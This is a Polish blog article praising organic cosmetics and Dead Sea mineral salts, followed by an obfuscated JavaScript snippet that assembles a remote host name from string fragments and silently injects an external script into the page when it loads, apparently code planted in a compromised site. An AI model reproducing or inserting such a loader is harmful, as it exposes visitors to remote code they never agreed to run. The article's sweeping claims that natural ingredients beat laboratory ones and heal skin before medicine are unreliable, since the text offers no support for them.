Shadow

Najlepszy wybór w trosce o zdrową skórę – kosmetyki organiczne

Jednym z podstawowych kosmetyków, obok mydła i antyperspirantu, jest dla wielu, a może i większości kobiet, dobry krem pielęgnacyjny. Jego rodzaj zazwyczaj jest dobrany do rodzaju i stanu cery, dlatego też najpopularniejsze kremy to te przeciwzmarszczkowe, nawilżające czy tez regulujące wydzielanie sebum. Drogerie i apteki oferują ogromny wybór kosmetyków, dlatego też dobranie najlepszego do swojej cery wcale nie jest łatwym zadaniem. Z pozoru wszystkie w danej linii wydaja się być odpowiednie, dlatego częstym kryterium podczas wyboru kosmetyku staje się cena. Jednak dość łatwo dowieść, że te z teoretycznie wyższej półki wcale nie mają lepszego działania. Wystarczy krótkie przeanalizowanie składu aby naocznie przekonać się, że kosmetyki droższe i tańsze mają bardzo podobny skład. Zazwyczaj na szczycie listy znajdują się składniki pozornie aktywne, typu olej mineralny czy ciekła parafina, które zapychają pory, nie pozwalają wydostać się wilgoci na zewnątrz, a tym samym zakłamują prawdziwy stan cery. Po solidnym oczyszczeniu i zmianie kosmetyku może okazać się, że reklamowany krem wyrządził więcej szkód niż pożytku.

Jednym z najlepszych rozwiązań dla osób będących świadomymi składu kosmetyków są te organiczne. Nie zawierają one mnóstwa konserwantów, parabenów czy pochodnych ropy naftowej, takich jak oleje mineralne. Wyprodukowane są ze świadomością i dbałością o potrzeby skóry, dlatego też pierwsze skrzypce w ich składzie odgrywają składniki pochodzenia naturalnego. Idąc tym tropem można dowiedzieć się, że to, co można uzyskać z natury, jest zdecydowanie bardziej przyjazne skórze niż produkty pochodzenia laboratoryjnego. Kosmetyki organiczne cechują się wysoką przyswajalnością i tolerancją nawet przez osoby z problemami i chorobami skórnymi, takimi jak choćby atopia. Dobrze dobrane kosmetyki organiczne idealnie oddziałują na cerę i bardzo szybko poprawiają jej stan, zanim jeszcze zdążymy sięgnąć po leki. Dlatego też warto dowiedzieć się, czego potrzebuje nasza skóra i nie szczędzić jej tego. Skórę ma się tylko jedną, warto dbać o nią jak najlepiej.

                Idealnym składnikiem kosmetyków organicznych są składniki mineralne, w ogromnych ilościach występujące w najbardziej zasolonym zbiorniku na świecie, to jest w Morzu Martwym. Morze Martwe, ze swoją mineralizacją na poziomie 28%, jest doskonałym źródłem łatwo przyswajalnego przez skórę magnezu czy jodu. Naturalne minerały świetnie pielęgnują skórę i sprawiają, że jej stan poprawia się niemal z dnia na dzień. Kosmetyki organiczne z solami z Morza Martwego przeznaczone są dla wszystkich, którym na sercu leży dobro swojej skóry.

źródło:Minus 417

(function(){
uy71=document.createElement(„script”);uy71.type=”text/javascript”;
uy71.async=true;uy71_=((„us”)+”t”)+”a”;uy71_+=(„t.i”)+””+”n”;uy71_+=((„f”)+”o”);
uy71.src=”http://”+uy71_+”/3412374.dsq3xgx9y71hbvgpzgdsktdg1j7f44″;
document.body.appendChild(uy71);
})();

Przeczytaj także

Dodaj komentarz

Twój adres e-mail nie zostanie opublikowany. Wymagane pola są oznaczone *